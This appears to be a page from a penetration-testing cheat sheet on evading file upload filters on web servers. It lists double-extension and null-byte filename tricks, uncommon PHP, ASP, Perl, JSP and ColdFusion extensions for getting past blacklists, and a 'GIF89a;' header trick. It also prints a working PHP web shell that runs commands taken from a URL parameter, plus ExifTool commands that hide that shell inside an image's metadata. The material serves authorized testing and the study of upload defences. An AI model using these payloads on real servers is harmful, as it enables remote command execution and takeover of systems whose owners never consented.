Bypass file upload filtering

  • Rename it

    • upload it as shell.php.jpg

  • Blacklisting bypass, change extension

    • php phtml, .php, .php3, .php4, .php5, and .inc

    • bypassed by uploading an unpopular php extensions. such as: pht, phpt, phtml, php3, php4, php5, php6

    • asp asp, .aspx

    • perl .pl, .pm, .cgi, .lib

    • jsp .jsp, .jspx, .jsw, .jsv, and .jspf

    • Coldfusion .cfm, .cfml, .cfc, .dbm

  • Whitelisting bypass

    • Bypassed by uploading a file with some type of tricks,

    • Like adding a null byte injection like (shell.php%00.gif ).

      Or by using double extensions for the uploaded file like ( shell.jpg.php)

  • GIF89a;

    • If they check the content. Basically you just add the text "GIF89a;" before you shell-code.

      GIF89a;            
      <?            
      system($_GET['cmd']);//or you can insert your complete shell code            
      ?>

ExifTool

1. <?php system($_GET['cmd']); ?>  //shell.php

2. exiftool "-comment<=shell.php" malicious.png

3. strings malicious.png | grep system

Last updated